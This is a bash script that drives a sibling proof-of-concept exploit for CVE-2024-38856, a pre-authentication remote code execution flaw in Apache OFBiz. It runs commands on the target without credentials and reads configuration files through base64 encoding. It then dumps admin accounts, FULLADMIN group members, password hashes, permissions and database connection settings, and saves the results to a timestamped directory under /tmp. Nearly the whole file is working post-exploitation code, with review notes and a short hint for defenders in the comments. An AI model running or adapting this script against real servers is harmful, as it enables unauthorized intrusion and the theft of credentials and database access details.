#!/usr/bin/env bash
# poc2.sh — high-level OFBiz recon driver.
# Chains cve-2024-38856.sh to: (1) read key config files via the RCE,
# (2) dump the admin user record + FULLADMIN membership/perms,
# (3) write everything to a timestamped dir under /tmp.
#
# All operations go through the unauthenticated CVE-2024-38856 chain in the
# sibling PoC script. No credentials, no session.
#
# Usage: poc2.sh   (takes no arguments). This driver never passes a target
# host to the sibling script, so target selection presumably lives in the
# sibling's own configuration — confirm there; it is not visible here.
# Operator-host tools used: bash, base64, awk, wc, date, mkdir, ls, grep, head.
#
# Strict mode: the first failing command (including a failed PoC call or a
# failed local decode) ends the whole run.
set -euo pipefail
# Sibling exploit script, resolved relative to this file's own directory.
POC="$(dirname "$0")/cve-2024-38856.sh"
# Fail early, with the diagnostic on stderr, if the sibling is absent or not
# executable.
[ -x "$POC" ] || { echo "ERROR: $POC not found or not executable" >&2; exit 1; }
# Per-run artifact directory: /tmp/poc2-<UTC timestamp>. mkdir -p applies only
# the caller's umask — no explicit mode is set — although step 3 below stores
# credential hashes in it. For defenders: a /tmp/poc2-* directory is the
# operator-side artifact of this tool.
OUTDIR=/tmp/poc2-$(date -u +%Y%m%dT%H%M%SZ)
mkdir -p "$OUTDIR"
echo "[*] output dir: $OUTDIR"
echo
# Helper: read a file from the OFBiz target by base64-encoding it on the wire,
# decoding locally. Avoids HTML-encoding of <, > in the error-renderer exfil.
#
# Arguments: $1 - path on the target; interpolated verbatim (unquoted) into the
#                 remote shell command string, so it must be a plain path —
#                 every caller below passes a fixed literal
#            $2 - local file name, created under $OUTDIR
# Globals:   POC, OUTDIR (read)
# Outputs:   progress line + byte count on stdout; decoded bytes in $OUTDIR/$2
# Returns:   a failing PoC call or local decode is non-zero and, with set -e
#            active, ends the script
read_remote_file() {
local remote_path="$1" local_name="$2"
echo "[*] reading $remote_path -> $local_name"
# The remote side runs "base64 < <path>"; on the target this shows up as a
# base64 child process of the OFBiz JVM. The PoC's own stdout is discarded and
# the encoded body is captured via --out. Argument order is the sibling
# script's CLI contract, which is not visible from this file.
"$POC" "base64 < $remote_path" --out "$OUTDIR/$local_name.b64" >/dev/null
# Decode locally, then drop the intermediate .b64 (rm -f: no error if absent).
base64 -d < "$OUTDIR/$local_name.b64" > "$OUTDIR/$local_name"
rm -f "$OUTDIR/$local_name.b64"
# Size report; awk '{print $1}' trims the leading whitespace some wc
# implementations emit.
echo " $(wc -c < "$OUTDIR/$local_name" | awk '{print $1}') bytes"
}
# Helper: run a mode and save its output
#
# Arguments: $1 - human-readable label for the progress line
#            $2 - local file name, created under $OUTDIR
#            $3… - passed through unchanged to the PoC script (its mode flags
#                  and their operands)
# Globals:   POC, OUTDIR (read)
# Outputs:   progress line + byte count on stdout; raw PoC output in $OUTDIR/$2
# Returns:   the PoC's exit status propagates; with set -e active a failure
#            ends the script
run_mode() {
local label="$1" outfile="$2"
shift 2
echo "[*] $label -> $outfile"
# Pass-through arguments precede --out; the PoC's stdout is discarded here and
# only the --out file is kept.
"$POC" "$@" --out "$OUTDIR/$outfile" >/dev/null
# Size report; awk '{print $1}' trims the leading whitespace some wc
# implementations emit.
echo " $(wc -c < "$OUTDIR/$outfile" | awk '{print $1}') bytes"
}
# --- Main sequence. Each step is one or more PoC invocations against the
# target; every artifact lands in $OUTDIR via read_remote_file/run_mode.
echo "=== 1. process identity ==="
# Remote `id`: reports the account the OFBiz JVM runs as. On the target this is
# an `id` child process of the JVM.
run_mode "running id" "00-id.txt" id
echo
echo "=== 2. config files ==="
# Paths are relative; they resolve against whatever working directory the
# remote command runs in (assumed to be the OFBiz install root — not verified
# here).
read_remote_file "framework/entity/config/entityengine.xml" "10-entityengine.xml"
read_remote_file "framework/security/config/security.properties" "11-security.properties"
read_remote_file "framework/catalina/ofbiz-component.xml" "12-catalina-component.xml"
read_remote_file "framework/base/ofbiz-component.xml" "13-base-component.xml"
echo
echo "=== 3. admin recon (via entity engine, pre-auth) ==="
# --dump/--members/--users/--perms are the sibling PoC's mode flags. Operands
# here are an entity name plus a row limit, or a security group id; the output
# formats are defined by the PoC and are not visible from this file.
run_mode "admin UserLogin row" "20-admin-userlogin.txt" --dump UserLogin 1
run_mode "FULLADMIN members" "21-fulladmin-members.txt" --members FULLADMIN
run_mode "FULLADMIN users + hashes" "22-fulladmin-users.txt" --users FULLADMIN
run_mode "FULLADMIN permissions" "23-fulladmin-perms.txt" --perms FULLADMIN
run_mode "all SecurityGroups" "24-securitygroups.txt" --dump SecurityGroup 100
run_mode "all UserLogin rows" "25-all-userlogin.txt" --users
echo
echo "=== 4. summary ==="
SUMMARY="$OUTDIR/SUMMARY.txt"
# The whole group's stdout is redirected to SUMMARY. The 2>/dev/null on the
# readers only hides "no such file" messages; it does not change exit status.
# NOTE(review): set -e / pipefail are still in force inside this group, so a
# grep that matches nothing (exit 1) or a missing input file ends the script
# at that line and leaves SUMMARY truncated.
{
echo "OFBiz recon via CVE-2024-38856 pre-auth RCE"
echo "Generated: $(date -u +%FT%TZ)"
echo "Output dir: $OUTDIR"
echo
echo "=== target process identity ==="
cat "$OUTDIR/00-id.txt" 2>/dev/null
echo
echo "=== captured files ==="
# Prints "<size> <name>" per entry. $NF is the last whitespace-separated field,
# so a name containing spaces would be cut; all names written here are fixed
# and space-free.
ls -la "$OUTDIR/" | awk 'NR>1 {printf " %s %s\n", $5, $NF}'
echo
echo "=== password hash policy (from security.properties) ==="
# Only keys starting with "password." are reported, capped at 20 lines.
grep -E '^password\.' "$OUTDIR/11-security.properties" 2>/dev/null | head -20
echo
echo "=== datasource definitions (from entityengine.xml) ==="
# Reports datasource names, JDBC URIs and usernames (first 20 matching lines);
# everything else stays in the raw 10-entityengine.xml.
grep -E '<datasource name=|jdbc-uri=|jdbc-username=' "$OUTDIR/10-entityengine.xml" 2>/dev/null | head -20
echo
echo "=== FULLADMIN members ==="
# NOTE(review): the heading says "members" but the file read is 22-* (the
# --users output, labelled "users + hashes" above), not 21-* (--members).
cat "$OUTDIR/22-fulladmin-users.txt" 2>/dev/null
echo
echo "=== FULLADMIN permission count ==="
# Shows only the first line beginning with "group="; whether that line carries
# a count depends on the PoC's --perms output format, which is not visible here.
grep -m1 '^group=' "$OUTDIR/23-fulladmin-perms.txt" 2>/dev/null
} > "$SUMMARY"
echo "[+] done"
echo "[+] summary: $SUMMARY"
echo
# Final listing of every artifact left in $OUTDIR.
ls -la "$OUTDIR/"